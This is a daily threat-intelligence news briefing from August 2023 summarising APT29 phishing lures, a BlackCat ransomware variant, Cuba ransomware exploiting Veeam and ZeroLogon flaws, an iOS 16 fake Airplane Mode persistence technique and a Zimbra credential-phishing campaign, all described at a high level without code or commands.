Cyware Daily Threat Intelligence
Daily Threat Briefing • Aug 18, 2023
We use cookies to improve your experience. Do you accept?
Daily Threat Briefing • Aug 18, 2023
The BlackCat ransomware has evolved its tactics, with a new version noticed by Microsoft experts recently. This version incorporates Impacket and a PsExec-like tool called Remcom for lateral movement and remote code execution on compromised networks. Another unidentified threat group used a mass-spreading technique against Zimbra Collaboration users to steal credentials. The campaign, active since April, has been targeting small-medium businesses and government entities.
In a different development, researchers crafted an attack scenario for iOS 16 devices, creating a synthetic Airplane Mode to remain undetected. Apple clarified that this doesn't exploit a specific vulnerability but is a method for persistence after the initial compromise.
APT29 targets NATO-aligned MoFA
Researchers at EclecticIQ encountered an attack campaign by the Russia-linked APT29, targeting Ministries of Foreign Affairs of NATO-aligned countries. The group used PDF files masquerading as communications from the German embassy. The PDFs contained diplomatic invitation lures, with one delivering a variant of the Duke malware. The second PDF was presumably used for reconnaissance, to notify the attackers whether a victim opened the message.
Access major auction house network for $120,000
Initial Access Brokers (IABs) breached a major auction house's network and are offering access to the compromised network for $120,000, according to researchers at threat intelligence company Flare. The IAB advertisements on the forum, between May 1 and July 27, show over 100 companies were targeted across 18 industries, with organizations in the U.S., Australia, and the U.K being the most common targets. The finance and retail sectors accounted for the most number of attacks.
New BlackCat ransomware variant surfaces
Microsoft uncovered a new version of the BlackCat ransomware, which incorporates tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket, a toolset for network protocol research and penetration testing, and RemCom, an open-source alternative to PsExec, facilitate ransomware deployment and remote access within the compromised network.
Cuba operators exploit Veeam flaw
The Cuba ransomware group has been seen deploying a comprehensive toolset, including BUGHATCH (a custom downloader), BURNTCIGAR (an antimalware killer), Wedgecut (a host enumeration utility), Metasploit, and Cobalt Strike frameworks. The criminals used a couple of exploits - Veeam Backup & Replication vulnerability (CVE-2023-27532) and the ZeroLogon bug (CVE-2020-1472) against critical Infrastructure sector in the U.S. and Latin America-based IT integrator.
Post-exploit persistence technique on iOS 16
Researchers from Jamf Threat Labs found a new post-exploit persistence technique on iOS 16 that allows attackers to maintain access to an Apple device even when the victim believes it is in Airplane Mode. Through this technique, the attacker remains hidden while maintaining a cellular network connection for a malicious application. By blocking cellular data access for specific apps and altering the alert window to appear as if Airplane Mode is enabled, attackers can create an artificial Airplane Mode that hides their activities and maintains connectivity for their rogue application.
Phishing campaign steals Zimbra credentials
ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. The file opens a fake Zimbra login page designed to collect credentials, which are then exfiltrated to a server controlled by the attackers.